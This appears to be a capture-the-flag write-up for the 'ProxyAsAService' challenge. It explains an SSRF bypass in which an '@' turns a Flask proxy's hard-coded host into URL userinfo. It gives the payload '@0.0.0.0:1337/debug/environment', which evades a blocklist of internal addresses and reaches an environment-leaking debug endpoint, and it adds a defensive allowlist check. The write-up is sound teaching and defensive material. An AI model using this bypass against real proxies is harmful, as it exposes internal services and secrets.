ProxyAsAService

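Appending @attacker.com to a host, as in http://example.com@attacker.com/, sends the request to http://attacker.com/, because everything before the @ is parsed as userinfo (credentials) rather than as the host.

According to the source code, the flag is in the environment, which we can read by visiting http://localhost/debug/environment: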

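```python
import random

from flask import Blueprint, Response, redirect, request, url_for

# proxy_req is the challenge's own request helper; its definition is not shown here.

SITE_NAME = 'reddit.com'

proxy_api = Blueprint('proxy_api', __name__)
debug     = Blueprint('debug', __name__)


@proxy_api.route('/', methods=['GET', 'POST'])
def proxy():
    url = request.args.get('url')

    if not url:
        cat_meme_subreddits = [
            '/r/cats/',
            '/r/catpictures',
            '/r/catvideos/'
        ]

        random_subreddit = random.choice(cat_meme_subreddits)

        return redirect(url_for('.proxy', url=random_subreddit))

    # Vulnerable: user input is concatenated directly after the host name,
    # so it can extend the authority part of the URL.
    target_url = f'http://{SITE_NAME}{url}'
    response, headers = proxy_req(target_url)

    return Response(response.content, response.status_code, headers.items())
```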

The proxy builds target_url=http://reddit.com{url}. To complete the challenge, we need to turn it into:

target_url=http://reddit.com@0.0.0.0:1337/debug/environment

`127.` and `localhost` are banned, and the application is deployed locally on port 1337, which is why the payload uses 0.0.0.0:1337; that address is not on the blocklist:

RESTRICTED_URLS = ['localhost', '127.', '192.168.', '10.', '172.']
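
Why the blocklist fails and what a stricter check looks like, as an added example that is not part of the challenge source. It assumes the blocklist is applied as a substring match on the `url` parameter (the page does not show that code); `blocklist_allows`, `effective_host`, `is_internal_literal` and `is_safe_target` are hypothetical names.

```python
import ipaddress
from urllib.parse import urlsplit

SITE_NAME = 'reddit.com'
RESTRICTED_URLS = ['localhost', '127.', '192.168.', '10.', '172.']


def blocklist_allows(url_param):
    """Substring blocklist (assumed usage of RESTRICTED_URLS)."""
    return not any(bad in url_param for bad in RESTRICTED_URLS)


def effective_host(url_param):
    """Host the HTTP client connects to once the input is concatenated."""
    return urlsplit(f'http://{SITE_NAME}{url_param}').hostname


def is_internal_literal(host):
    """True for IP literals that point at loopback, private or unspecified space."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name: resolve it and re-check the result before connecting
    return ip.is_loopback or ip.is_private or ip.is_unspecified or ip.is_link_local


def is_safe_target(url_param):
    """Allowlist check: input must be a path, and the parsed host must be SITE_NAME."""
    if not url_param.startswith('/'):
        return False  # anything else can extend the authority (userinfo, port, suffix)
    parts = urlsplit(f'http://{SITE_NAME}{url_param}')
    if parts.username is not None or parts.password is not None:
        return False
    return parts.hostname == SITE_NAME and parts.port is None


if __name__ == '__main__':
    # The payload from this write-up and one of the app's own default paths.
    for candidate in ['@0.0.0.0:1337/debug/environment', '/r/cats/']:
        host = effective_host(candidate)
        print(candidate, '| blocklist allows:', blocklist_allows(candidate),
              '| host:', host, '| internal:', is_internal_literal(host),
              '| safe:', is_safe_target(candidate))
```

The substring blocklist accepts the payload because it never parses the URL, while the allowlist check rejects it before any request is made.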

Further reading:

URL format bypass | HackTricks